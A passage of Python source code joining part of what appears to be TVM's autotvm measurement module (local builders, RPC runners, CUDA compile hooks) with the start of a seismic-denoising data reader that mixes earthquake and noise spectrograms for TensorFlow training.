    Stores all the necessary inputs for a measurement.

    Parameters
    ----------
    filename : str
        The filename of generated library
    arg_info : Tuple
        The shape and dtype information of tvm tensor arguments
    error : Exception
        The error happens during compilation.
    time_cost : float
        The time cost of building
    """
    # NOTE: behaves exactly like the underlying namedtuple; the subclass
    # exists only to attach this docstring.
class LocalBuilder(Builder):
    """Run compilation on local machine

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    n_parallel: int
        The number of tasks run in parallel. "None" will use all cpu cores
    build_func: callable or str
        If is 'default', use default build function
        If is 'ndk', use function for android ndk
        If is callable, use it as custom build function, expect lib_format field.
    """
    def __init__(self, timeout=10, n_parallel=None, build_func='default'):
        super(LocalBuilder, self).__init__(timeout, n_parallel)

        # Resolve the string shorthands to concrete export functions.
        if isinstance(build_func, str):
            if build_func == 'default':
                build_func = tar.tar
            elif build_func == 'ndk':
                build_func = ndk.create_shared
            else:
                raise ValueError("Invalid build_func" + build_func)

        self.build_func = _wrap_build_func(build_func)
        self.executor = LocalExecutor(timeout=timeout)
        self.tmp_dir = tempfile.mkdtemp()

    def build(self, measure_inputs):
        """Compile measure_inputs in parallel batches of n_parallel.

        Returns one entry per input: a BuildResult on success, or a
        MeasureResult describing how the build failed.
        """
        results = []

        # Start from a fresh temporary directory on every call so artifacts
        # from previous rounds cannot accumulate.
        shutil.rmtree(self.tmp_dir)
        self.tmp_dir = tempfile.mkdtemp()

        for i in range(0, len(measure_inputs), self.n_parallel):
            futures = []
            for inp in measure_inputs[i:i + self.n_parallel]:
                ret = self.executor.submit(self.build_func,
                                           inp,
                                           self.tmp_dir,
                                           **self.build_kwargs)
                futures.append(ret)

            for future in futures:
                res = future.get()

                if isinstance(res, Exception):
                    # timeout or fleet error, return MeasureResult directly
                    results.append(MeasureResult((res,), MeasureErrorNo.BUILD_TIMEOUT,
                                                 self.timeout, time.time()))
                elif res.error is not None:
                    # instantiation error
                    if isinstance(res.error, InstantiationError):
                        results.append(MeasureResult((res.error,),
                                                     MeasureErrorNo.INSTANTIATION_ERROR,
                                                     res.time_cost, time.time()))
                    else:
                        if "InstantiationError" in str(res.error):
                            # The error crossed a process boundary as text;
                            # best-effort recovery of the original message.
                            msg = str(res.error)
                            try:
                                msg = msg.split('\n')[-2].split(": ")[1]
                            except Exception:  # pylint: disable=broad-except
                                pass
                            results.append(MeasureResult((InstantiationError(msg),),
                                                         MeasureErrorNo.INSTANTIATION_ERROR,
                                                         res.time_cost, time.time()))
                        else:  # tvm error
                            results.append(MeasureResult((res.error,),
                                                         MeasureErrorNo.COMPILE_HOST,
                                                         res.time_cost, time.time()))
                else:
                    # return BuildResult
                    results.append(res)

        return results
class RPCRunner(Runner):
    """Run generated code on remove devices.
    This function will ask a RPC Tracker to get device for measurement.

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    n_parallel: int
        The number of tasks run in parallel. "None" will use all cpu cores
    key: str
        The key of the device registered in the tracker
    host: str
        The host address of RPC Tracker
    port: int
        The port of RPC Tracker
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first "1" is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float, optional
        The cool down interval between two measurements.
    check_correctness: bool, optional
        Whether check correctness after measurement. This will use llvm cpu target to
        call your template and get the reference output.
        This can work for TOPI templates, but may not work for your custom template.
    """
    def __init__(self,
                 key, host, port, priority=1,
                 timeout=10, n_parallel=None,
                 number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
                 check_correctness=False):
        super(RPCRunner, self).__init__(timeout, n_parallel)

        self.key = key
        self.host = host
        self.port = port
        self.priority = priority
        self.timeout = timeout

        self.number = number
        self.repeat = repeat
        self.min_repeat_ms = min_repeat_ms

        # Reference input/output, populated by set_task when
        # check_correctness is enabled.
        self.ref_input = None
        self.ref_output = None
        self.check_correctness = check_correctness
        self.cooldown_interval = cooldown_interval

        self.executor = LocalExecutor()

    def set_task(self, task):
        """Bind a tuning task; verify a device is reachable and, optionally,
        build an llvm-cpu reference output for correctness checking."""
        self.task = task

        if check_remote(task.target, self.key, self.host, self.port):
            logger.info("Get devices for measurement successfully!")
        else:
            raise RuntimeError("Cannot get remote devices from the tracker. "
                               "Please check the status of tracker by "
                               "'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
                               "and make sure you have free devices on the queue status.")

        if self.check_correctness:
            # use llvm cpu to generate a reference input/output
            # this option works for tuning topi, but might not work for you custom op
            with _target.create("llvm"):
                s, arg_bufs = task.instantiate(task.config_space.get(0))
            self.ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
                              for x in arg_bufs]
            func = build(s, arg_bufs, "llvm")
            tvm_buf = [nd.array(x) for x in self.ref_input]
            func(*tvm_buf)
            self.ref_output = [x.asnumpy() for x in tvm_buf]

    def get_build_kwargs(self):
        """Query a remote device's limits (thread/memory bounds, compute
        version) and return them as kwargs for the build step."""
        kwargs = {}
        if 'cuda' in self.task.target.keys or 'opencl' in self.task.target.keys:
            remote = request_remote(self.key, self.host, self.port)
            ctx = remote.context(str(self.task.target), 0)
            max_dims = ctx.max_thread_dimensions
            kwargs['check_gpu'] = {
                'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
                'max_threads_per_block': ctx.max_threads_per_block,
                'max_thread_x': max_dims[0],
                'max_thread_y': max_dims[1],
                'max_thread_z': max_dims[2],
            }

            if 'cuda' in self.task.target.keys:
                kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))

        return kwargs

    def run(self, measure_inputs, build_results):
        """Measure each (input, build) pair on remote devices in batches of
        n_parallel; returns a MeasureResult per input."""
        results = []
        remote_args = (self.key, self.host, self.port, self.priority, self.timeout)

        for i in range(0, len(measure_inputs), self.n_parallel):
            futures = []
            for measure_inp, build_res in zip(measure_inputs[i:i+self.n_parallel],
                                              build_results[i:i+self.n_parallel]):
                ret = self.executor.submit(run_through_rpc,
                                           measure_inp,
                                           build_res,
                                           self.number,
                                           self.repeat,
                                           self.min_repeat_ms,
                                           self.cooldown_interval,
                                           remote_args,
                                           self.ref_input,
                                           self.ref_output)
                futures.append(ret)

            for future in futures:
                res = future.get()
                if isinstance(res, Exception):   # executor error or timeout
                    results.append(MeasureResult((str(res),), MeasureErrorNo.RUN_TIMEOUT,
                                                 self.timeout, time.time()))
                else:
                    results.append(res)

        return results
class LocalRunner(RPCRunner):
    """Run generated code on local devices.

    Parameters
    ----------
    timeout: float
        The timeout of a compilation
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first one is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float, optional
        The cool down interval between two measurements.
    check_correctness: bool, optional
        Whether check correctness after measurement. This will use llvm cpu target to
        call your template and get the reference output.
        This can work for TOPI templates, but may not work for your custom template.

    Note
    ----
    This is a "fake" local mode. We start a silent rpc tracker and rpc server
    for the user. In this way we reuse timeout/isolation mechanism in RPC infrastructure.
    """
    def __init__(self,
                 timeout=10,
                 number=4, repeat=3, min_repeat_ms=0, cooldown_interval=0.1,
                 check_correctness=False):
        # key/host/port are filled in later by set_task, once the private
        # tracker+server pair exists; n_parallel is forced to 1 locally.
        super(LocalRunner, self).__init__('', None, None, 0,
                                          timeout=timeout, n_parallel=1,
                                          number=number, repeat=repeat,
                                          min_repeat_ms=min_repeat_ms,
                                          cooldown_interval=cooldown_interval,
                                          check_correctness=check_correctness)
        self.tracker = None
        self.server = None

    def set_task(self, task):
        self.task = task
        # Imported lazily to avoid a hard dependency at module import time.
        from ...rpc.tracker import Tracker
        from ...rpc.server import Server

        # Spin up a silent tracker + server on a free port in [9000, 10000)
        # and register the local device under a per-port key.
        tracker = Tracker('0.0.0.0', port=9000, port_end=10000, silent=True)
        device_key = '$local$device$%d' % tracker.port
        server = Server('0.0.0.0', port=9000, port_end=10000,
                        key=device_key,
                        use_popen=True, silent=True,
                        tracker_addr=(tracker.host, tracker.port))
        self.key = device_key
        self.host = tracker.host
        self.port = tracker.port

        super(LocalRunner, self).set_task(task)
        # Returned so the caller can keep them alive (and shut them down)
        # for the duration of the measurement.
        return server, tracker
def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
    """Common part for building a configuration.

    Instantiates the task with the given config, optionally installs the
    GPU-limit verification pass and the cuda arch, builds the function, and
    returns ``(func, arg_info)`` where arg_info is a tuple of
    (shape, dtype) pairs for the tensor arguments.
    """
    target, task, config = measure_input

    with target:
        s, args = task.instantiate(config)

        # check invalidity of template and code hash consistency
        if not config.valid():
            raise InstantiationError(config.errors)

        opts = build_option or {}
        if check_gpu:  # Add verify pass to filter out invalid configs in advance.
            opts["add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
        if cuda_arch:
            set_cuda_target_arch(cuda_arch)

        # if target is vta, we need to use vta build
        if hasattr(measure_input.target, 'device_name') and \
            measure_input.target.device_name == 'vta':
            import vta
            func = vta.build(s, args, target_host=task.target_host)
        else:
            with build_config(**opts):
                func = build(s, args, target_host=task.target_host)
    return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
    """
    Wrap build_func to a function that can be used in measure.

    Parameters
    ----------
    build_func : The compilation function
        We expect fcompile to contain an attr "output_format"

    Returns
    -------
    wrapped_build_func : function
        The wrapped build function
    """
    if not hasattr(build_func, "output_format"):
        raise AttributeError("Expect build_func to have the attribute output_format.")
    output_format = build_func.output_format

    def _wrapped(measure_input, tmp_dir, **kwargs):
        """
        Wrapped build func.

        Parameters
        ----------
        measure_input: MeasureInput
            The input of measurement
        tmp_dir: str
            The path of temporary directory to export generated library
        """
        tic = time.time()
        try:
            # A random 64-bit suffix avoids filename collisions between
            # parallel build jobs writing into the same tmp_dir.
            filename = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
                getrandbits(64), output_format))
            # TODO(tvm-team) consider linline _build_func_common
            func, arg_info = _build_func_common(measure_input, **kwargs)
            func.export_library(filename, build_func)
        except Exception as e:  # pylint: disable=broad-except
            # Any failure (including InstantiationError) is reported via
            # BuildResult.error rather than raised, so the builder can
            # classify it.
            return BuildResult(None, None, e, time.time() - tic)
        return BuildResult(filename, arg_info, None, time.time() - tic)
    return _wrapped
def run_through_rpc(measure_input, build_result,
                    number, repeat, min_repeat_ms, cooldown_interval,
                    remote_args, ref_input=None, ref_output=None):
    """Run a generated library through rpc

    Parameters
    ----------
    measure_input: MeasureInput
        The raw measure input
    build_result: BuildResult
        The result returned from Builder. This contains the path to the generated library.
    number: int
        The number of times to run the generated code for taking average.
        We call these runs as one `repeat` of measurement.
    repeat : int, optional
        The number of times to repeat the measurement.
        In total, the generated code will be run (1 + number x repeat) times,
        where the first one is warm up and will be discarded.
        The returned result contains `repeat` costs,
        each of which is an average of `number` costs.
    min_repeat_ms: int, optional
        The minimum duration of one `repeat` in milliseconds.
        By default, one `repeat` contains `number` runs. If this parameter is set,
        the parameters `number` will be dynamically adjusted to meet the
        minimum duration requirement of one `repeat`.
        i.e., When the run time of one `repeat` falls below this time, the `number` parameter
        will be automatically increased.
    cooldown_interval: float
        The cool down interval between two measurements
    remote_args: Tuple
        The argument for request_remote
    ref_input: List of np.ndarray
        The reference input used for checking correctness
    ref_output: List of np.ndarray
        The reference output used for checking correctness
    """
    if isinstance(build_result, MeasureResult):
        # The build already failed; propagate its MeasureResult unchanged.
        return build_result

    tic = time.time()
    errno = MeasureErrorNo.NO_ERROR
    try:
        # upload built module
        remote = request_remote(*remote_args)
        # Program the FPGA every single time when targeting VTA
        if hasattr(measure_input.target, 'device_name') and \
            measure_input.target.device_name == 'vta':
            from vta import program_fpga, reconfig_runtime
            program_fpga(remote, None)
            reconfig_runtime(remote)
        remote.upload(build_result.filename)
        func = remote.load_module(os.path.split(build_result.filename)[1])
        ctx = remote.context(str(measure_input.target), 0)
        time_f = func.time_evaluator(
            func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)

        # set input
        if ref_input:
            args = [nd.array(x, ctx=ctx) for x in ref_input]
        else:
            # create empty arrays on the remote device and copy them once.
            # This can avoid some memory issues that make the measurement results unreliable.
            args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
            args = [nd.array(x, ctx=ctx) for x in args]
            ctx.sync()

        costs = time_f(*args).results

        # clean up remote files
        remote.remove(build_result.filename)
        remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
        # NOTE(review): removing '' presumably clears the remote upload
        # directory itself — confirm against the RPC server implementation.
        remote.remove('')

        if len(costs) > 2:  # remove largest and smallest value to reduce variance
            costs = list(costs)
            costs.sort()
            costs = tuple(costs[1:-1])

        # check correctness of output
        if ref_output:
            for expected, real in zip(ref_output, args):
                if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
                    logger.warning("Wrong Answer!")
                    errno = MeasureErrorNo.WRONG_ANSWER
    except TVMError as exc:
        msg = str(exc)
        # Trim noisy native stack traces / generated CUDA source from the
        # message before it is stored in the result.
        if "Stack trace returned" in msg:
            msg = msg[:msg.index("Stack trace returned")]
        if "CUDA Source" in msg:
            msg = msg[:msg.index("CUDA Source")]
        costs = (RuntimeError(msg[:1024]),)
        errno = MeasureErrorNo.RUNTIME_DEVICE
    tstamp = time.time()
    time.sleep(cooldown_interval)
    return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
    """Request a remote RPC session from the tracker.

    Parameters
    ----------
    device_key: string
        The device key of registered device in tracker
    host: host, optional
        The host address of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_HOST"
    port: int, optional
        The port of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_PORT"
    priority: int, optional
        The priority of this request, larger is more prior
    timeout: float, optional
        The timeout of this session (units: second)

    Returns
    ------
    session: RPCSession
    """
    # Fall back to the tracker address from the environment when not given
    # explicitly, then ask the tracker for a device session.
    tracker_host = host or os.environ['TVM_TRACKER_HOST']
    tracker_port = port or int(os.environ['TVM_TRACKER_PORT'])

    tracker = _rpc.connect_tracker(tracker_host, tracker_port)
    return tracker.request(device_key, priority=priority,
                           session_timeout=timeout)
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
    """
    Check the availability of a remote device

    Parameters
    ----------
    target: Target
        The wanted compilation target
    device_key: string
        device key of registered device in tracker
    host: host, optional
        The host address of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_HOST"
    port: int, optional
        The port address of rpc tracker.
        If is none, will use environment variable "TVM_TRACKER_PORT"
    priority: int, optional
        The priority of this request, larger is more prior
    timeout: float, optional
        The timeout of this check (units: seconds).

    Returns
    -------
    available: bool
        True if can find available device
    """
    def _check():
        # Request a session and wait until a context for the target exists.
        remote = request_remote(device_key, host, port, priority)
        ctx = remote.context(str(target))
        while not ctx.exist:  # wait until we get an available device
            pass
    t = threading.Thread(target=_check,)
    # Bug fix: the probe busy-waits forever when no device ever becomes
    # available; as a non-daemon thread it would then keep the whole
    # process alive after the timeout below expires.  Mark it daemonic so
    # it cannot block interpreter shutdown.
    t.daemon = True
    t.start()
    t.join(timeout)
    # If the thread is still running, no device appeared within `timeout`.
    return not t.is_alive()
@register_func
def tvm_callback_cuda_compile(code):
    """use nvcc to generate ptx code for better optimization"""
    curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
    # e.g., target arch could be [
    #     "-gencode", "arch=compute_52,code=sm_52",
    #     "-gencode", "arch=compute_70,code=sm_70"
    # ]
    # A list of gencode flags means multiple architectures were requested,
    # so emit a fatbin; a single arch string compiles straight to ptx.
    target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
    ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
    return ptx
def set_cuda_target_arch(arch):
    """set target architecture of nvcc compiler

    Parameters
    ----------
    arch: str or list
        The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
        it can also be a list of gencode arguments passed to the nvcc command line,
        e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
    """
    # Stored in the autotvm global scope; read back by
    # tvm_callback_cuda_compile when CUDA code is compiled.
    AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
    """Build a lowering pass that rejects kernels exceeding GPU limits.

    The returned pass checks the statement against the limits in *kwargs*
    (memory usage, threads per block) and raises InstantiationError so the
    config is skipped instead of compiled.
    """
    def verify_pass(stmt):
        if not ir_pass.VerifyGPUCode(stmt, kwargs):
            raise InstantiationError("Skipped because of invalid gpu kernel")
        return stmt
    return verify_pass
|
data_reader.py | import numpy as np
import pandas as pd
import scipy.signal
import tensorflow as tf
# Silence pandas' SettingWithCopyWarning globally for this module.
pd.options.mode.chained_assignment = None
import logging
import os
import threading
import obspy
from scipy.interpolate import interp1d

# This module uses TF1-style graph execution, so eager mode must be off.
tf.compat.v1.disable_eager_execution()
# from tensorflow.python.ops.linalg_ops import norm
# from tensorflow.python.util import nest
class Config:
    """Static hyper-parameters for data generation and the spectrogram
    front end (nperseg/nfft presumably feed an STFT — confirm at call sites)."""
    seed = 100
    n_class = 2
    fs = 100              # sampling rate, Hz
    dt = 1.0 / fs         # sample interval, s
    freq_range = [0, fs / 2]
    time_range = [0, 30]
    nperseg = 30          # segment length for the spectrogram
    nfft = 60             # FFT length
    plot = False
    nt = 3000             # samples per trace
    X_shape = [31, 201, 2]
    Y_shape = [31, 201, n_class]
    signal_shape = [31, 201]
    noise_shape = signal_shape
    use_seed = False
    queue_size = 10
    noise_mean = 2
    noise_std = 1
    # noise_low = 1
    # noise_high = 5
    use_buffer = True
    snr_threshold = 10
# %%
# def normalize(data, window=3000):
# """
# data: nsta, chn, nt
# """
# shift = window//2
# nt = len(data)
# ## std in slide windows
# data_pad = np.pad(data, ((window//2, window//2)), mode="reflect")
# t = np.arange(0, nt, shift, dtype="int")
# # print(f"nt = {nt}, nt+window//2 = {nt+window//2}")
# std = np.zeros(len(t))
# mean = np.zeros(len(t))
# for i in range(len(std)):
# std[i] = np.std(data_pad[i*shift:i*shift+window])
# mean[i] = np.mean(data_pad[i*shift:i*shift+window])
# t = np.append(t, nt)
# std = np.append(std, [np.std(data_pad[-window:])])
# mean = np.append(mean, [np.mean(data_pad[-window:])])
# # print(t)
# ## normalize data with interplated std
# t_interp = np.arange(nt, dtype="int")
# std_interp = interp1d(t, std, kind="slinear")(t_interp)
# mean_interp = interp1d(t, mean, kind="slinear")(t_interp)
# data = (data - mean_interp)/(std_interp)
# return data, std_interp
# %%
def normalize(data, window=200):
    """Remove a sliding-window mean and scale by a sliding-window std.

    data: 3-D array with time on axis 1 (the original docstring said
    "nsta, chn, nt", which does not match the padding axes — presumably
    it is (nsta, nt, chn); TODO confirm with callers).
    Returns the normalized array and the per-sample interpolated std.
    """
    half = window // 2
    nt = data.shape[1]

    # Reflect-pad the time axis so windows near the edges are full-size.
    padded = np.pad(data, ((0, 0), (half, half), (0, 0)), mode="reflect")
    anchors = np.arange(0, nt, half, dtype="int")
    stds = np.zeros(len(anchors))
    means = np.zeros(len(anchors))
    for i in range(len(stds)):
        seg = padded[:, i * half : i * half + window, :]
        stds[i] = np.std(seg)
        means[i] = np.mean(seg)
    # Append one final anchor at nt computed from the trailing window.
    anchors = np.append(anchors, nt)
    stds = np.append(stds, [np.std(padded[:, -window:, :])])
    means = np.append(means, [np.mean(padded[:, -window:, :])])

    # Interpolate the window statistics to every sample, guard against a
    # zero std, and normalize.
    sample_idx = np.arange(nt, dtype="int")
    std_interp = interp1d(anchors, stds, kind="slinear")(sample_idx)
    std_interp[std_interp == 0] = 1.0
    mean_interp = interp1d(anchors, means, kind="slinear")(sample_idx)
    data = (data - mean_interp[np.newaxis, :, np.newaxis]) / std_interp[np.newaxis, :, np.newaxis]
    return data, std_interp
def normalize_batch(data, window=200):
    """Sliding-window normalization for a batch of spectrogram images.

    data: 4-D array (nbatch, nf, nt, 2) — real/imaginary parts stacked last.
    Each example is normalized by per-window mean/std taken over all of
    (nf, nt-window, 2). Returns a new array; the input is not modified.
    """
    assert len(data.shape) == 4
    hop = window // 2
    n_batch, _, n_time, _ = data.shape
    # Reflect-pad the time axis so edge windows are full-sized.
    padded = np.pad(data, ((0, 0), (0, 0), (hop, hop), (0, 0)), mode="reflect")
    anchors = np.arange(0, n_time + hop - 1, hop, dtype="int")  # e.g. nt=201 -> 0, 100, 200
    win_std = np.zeros([n_batch, len(anchors)])
    win_mean = np.zeros([n_batch, len(anchors)])
    for idx in range(len(anchors)):
        segment = padded[:, :, idx * hop : idx * hop + window, :]
        win_std[:, idx] = np.std(segment, axis=(1, 2, 3))
        win_mean[:, idx] = np.mean(segment, axis=(1, 2, 3))
    # The first/last windows overlap the reflected padding; reuse their
    # inner neighbours instead.
    win_std[:, -1], win_mean[:, -1] = win_std[:, -2], win_mean[:, -2]
    win_std[:, 0], win_mean[:, 0] = win_std[:, 1], win_mean[:, 1]
    # Interpolate the per-window statistics to every time step.
    dense_t = np.arange(n_time, dtype="int")
    std_interp = interp1d(anchors, win_std, kind="slinear")(dense_t)  # (nbatch, nt)
    std_interp[std_interp == 0] = 1.0  # guard against division by zero
    mean_interp = interp1d(anchors, win_mean, kind="slinear")(dense_t)
    data = (data - mean_interp[:, np.newaxis, :, np.newaxis]) / std_interp[:, np.newaxis, :, np.newaxis]
    if len(anchors) > 3:  # long inputs — extra scaling kept for training parity
        data /= 2.0
    return data
# %%
def py_func_decorator(output_types=None, output_shapes=None, name=None):
    """Decorator factory wrapping a plain Python function as a TF op.

    The wrapped function runs via tf.numpy_function; its flat outputs are
    given static shapes from `output_shapes` (when provided) and repacked
    into the structure described by `output_types`.
    """
    def decorator(func):
        def call(*args, **kwargs):
            nonlocal output_shapes
            flat_types = tf.nest.flatten(output_types)
            flat_values = tf.numpy_function(func, inp=args, Tout=flat_types, name=name)
            if output_shapes is not None:
                for tensor, static_shape in zip(flat_values, output_shapes):
                    tensor.set_shape(static_shape)
            return tf.nest.pack_sequence_as(output_types, flat_values)
        return call
    return decorator
def dataset_map(iterator, output_types, output_shapes=None, num_parallel_calls=None, name=None):
    """Build a tf.data.Dataset yielding iterator[i] for i in range(len(iterator))."""
    @py_func_decorator(output_types, output_shapes, name=name)
    def fetch(idx):
        return iterator[idx]
    indices = tf.data.Dataset.range(len(iterator))
    return indices.map(fetch, num_parallel_calls=num_parallel_calls)
class DataReader(object):
    """Threaded training-data generator for the denoising model.

    Worker threads pair earthquake waveforms with noise waveforms of the
    same channel codes, mix them at a random ratio in the STFT domain, and
    push (noisy spectrogram, target mask) pairs into a TF padding queue.
    """

    def __init__(
        self,
        signal_dir=None,
        signal_list=None,
        noise_dir=None,
        noise_list=None,
        queue_size=None,
        coord=None,
        config=Config(),
    ):
        """
        :param signal_dir: directory holding the signal .npz files.
        :param signal_list: CSV listing signal file names and channel codes.
        :param noise_dir: directory holding the noise .npz files.
        :param noise_list: CSV listing noise file names and channel codes.
        :param queue_size: capacity of the TF input queue.
        :param coord: tf.train.Coordinator used to stop worker threads.
        :param config: Config object with STFT/shape/mixing parameters.
        """
        self.config = config
        signal_list = pd.read_csv(signal_list, header=0)
        noise_list = pd.read_csv(noise_list, header=0)
        self.signal = signal_list
        self.noise = noise_list
        self.n_signal = len(self.signal)
        self.signal_dir = signal_dir
        self.noise_dir = noise_dir
        self.X_shape = config.X_shape
        self.Y_shape = config.Y_shape
        self.n_class = config.n_class
        self.coord = coord
        self.threads = []
        self.queue_size = queue_size
        self.add_queue()
        # Caches: precomputed STFTs keyed by file name, and per-channel-code
        # subsets of the signal/noise tables.
        self.buffer_signal = {}
        self.buffer_noise = {}
        self.buffer_channels_signal = {}
        self.buffer_channels_noise = {}

    def add_queue(self):
        """Create input placeholders and the (sample, target) padding queue."""
        with tf.device('/cpu:0'):
            self.sample_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
            self.target_placeholder = tf.compat.v1.placeholder(dtype=tf.float32, shape=None)
            self.queue = tf.queue.PaddingFIFOQueue(
                self.queue_size, ['float32', 'float32'], shapes=[self.config.X_shape, self.config.Y_shape]
            )
            self.enqueue = self.queue.enqueue([self.sample_placeholder, self.target_placeholder])
        return 0

    def dequeue(self, num_elements):
        """Dequeue a batch of `num_elements` (sample, target) pairs."""
        output = self.queue.dequeue_many(num_elements)
        return output

    def get_snr(self, data, itp, dit=300):
        """SNR around the P-arrival index `itp`: std of the `dit` samples
        after the pick over the std of the `dit` samples before it.
        Returns 0 when the pre-pick window is flat."""
        tmp_std = np.std(data[itp - dit : itp])
        if tmp_std > 0:
            return np.std(data[itp : itp + dit]) / tmp_std
        else:
            return 0

    def add_event(self, sample, channels, j):
        """Randomly stack extra event spectrograms (component `j`) onto
        `sample`; each round has a 20% chance of adding one more event
        drawn from files with the same channel codes."""
        while np.random.uniform(0, 1) < 0.2:
            shift = None
            if channels not in self.buffer_channels_signal:
                self.buffer_channels_signal[channels] = self.signal[self.signal['channels'] == channels]
            fname = os.path.join(self.signal_dir, self.buffer_channels_signal[channels].sample(n=1).iloc[0]['fname'])
            try:
                if fname not in self.buffer_signal:
                    meta = np.load(fname)
                    data_FT = []
                    snr = []
                    for i in range(3):
                        tmp_data = meta['data'][:, i]
                        tmp_itp = meta['itp']
                        snr.append(self.get_snr(tmp_data, tmp_itp))
                        tmp_data -= np.mean(tmp_data)
                        f, t, tmp_FT = scipy.signal.stft(
                            tmp_data,
                            fs=self.config.fs,
                            nperseg=self.config.nperseg,
                            nfft=self.config.nfft,
                            boundary='zeros',
                        )
                        data_FT.append(tmp_FT)
                    data_FT = np.stack(data_FT, axis=-1)
                    self.buffer_signal[fname] = {
                        'data_FT': data_FT,
                        'itp': tmp_itp,
                        'channels': meta['channels'],
                        'snr': snr,
                    }
                meta_signal = self.buffer_signal[fname]
            # Was a bare `except:` — do not swallow KeyboardInterrupt/SystemExit.
            except Exception:
                logging.error("Failed reading signal: {}".format(fname))
                continue
            if meta_signal['snr'][j] > self.config.snr_threshold:
                # np.complex_ was removed in NumPy 2.0; complex128 is the same dtype.
                tmp_signal = np.zeros([self.X_shape[0], self.X_shape[1]], dtype=np.complex128)
                shift = np.random.randint(-self.X_shape[1], 1, None, 'int')
                tmp_signal[:, -shift:] = meta_signal['data_FT'][:, self.X_shape[1] : 2 * self.X_shape[1] + shift, j]
                if np.isinf(tmp_signal).any() or np.isnan(tmp_signal).any() or (not np.any(tmp_signal)):
                    continue
                tmp_signal = tmp_signal / np.std(tmp_signal)
                sample += tmp_signal / np.random.uniform(1, 5)
        return sample

    def thread_main(self, sess, n_threads=1, start=0):
        """Worker loop: repeatedly build (noisy spectrogram, mask) pairs and
        enqueue them until the coordinator requests a stop."""
        stop = False
        while not stop:
            index = list(range(start, self.n_signal, n_threads))
            np.random.shuffle(index)
            for i in index:
                fname_signal = os.path.join(self.signal_dir, self.signal.iloc[i]['fname'])
                try:
                    if fname_signal not in self.buffer_signal:
                        meta = np.load(fname_signal)
                        data_FT = []
                        snr = []
                        for j in range(3):
                            tmp_data = meta['data'][..., j]
                            tmp_itp = meta['itp']
                            snr.append(self.get_snr(tmp_data, tmp_itp))
                            tmp_data -= np.mean(tmp_data)
                            f, t, tmp_FT = scipy.signal.stft(
                                tmp_data,
                                fs=self.config.fs,
                                nperseg=self.config.nperseg,
                                nfft=self.config.nfft,
                                boundary='zeros',
                            )
                            data_FT.append(tmp_FT)
                        data_FT = np.stack(data_FT, axis=-1)
                        self.buffer_signal[fname_signal] = {
                            'data_FT': data_FT,
                            'itp': tmp_itp,
                            'channels': meta['channels'],
                            'snr': snr,
                        }
                    meta_signal = self.buffer_signal[fname_signal]
                except Exception:
                    logging.error("Failed reading signal: {}".format(fname_signal))
                    continue
                channels = meta_signal['channels'].tolist()
                start_tp = meta_signal['itp'].tolist()
                if channels not in self.buffer_channels_noise:
                    self.buffer_channels_noise[channels] = self.noise[self.noise['channels'] == channels]
                fname_noise = os.path.join(
                    self.noise_dir, self.buffer_channels_noise[channels].sample(n=1).iloc[0]['fname']
                )
                try:
                    if fname_noise not in self.buffer_noise:
                        meta = np.load(fname_noise)
                        data_FT = []
                        # `k` (was `i`) — the original shadowed the outer file index.
                        for k in range(3):
                            tmp_data = meta['data'][: self.config.nt, k]
                            tmp_data -= np.mean(tmp_data)
                            f, t, tmp_FT = scipy.signal.stft(
                                tmp_data,
                                fs=self.config.fs,
                                nperseg=self.config.nperseg,
                                nfft=self.config.nfft,
                                boundary='zeros',
                            )
                            data_FT.append(tmp_FT)
                        data_FT = np.stack(data_FT, axis=-1)
                        self.buffer_noise[fname_noise] = {'data_FT': data_FT, 'channels': meta['channels']}
                    meta_noise = self.buffer_noise[fname_noise]
                except Exception:
                    logging.error("Failed reading noise: {}".format(fname_noise))
                    continue
                if self.coord.should_stop():
                    stop = True
                    break
                # Pick one of the three components at random.
